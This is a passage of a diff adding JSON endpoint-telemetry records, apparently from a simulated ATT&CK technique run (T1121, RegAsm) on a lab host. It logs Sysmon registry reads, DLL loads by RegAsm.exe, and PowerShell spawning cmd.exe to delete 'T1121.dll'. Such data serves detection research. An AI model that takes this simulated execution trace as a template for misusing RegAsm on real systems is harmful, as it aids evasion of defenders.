"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mscoreei.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"del T1121.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3428, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570869070000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "process", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5836, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570869260000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clr.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 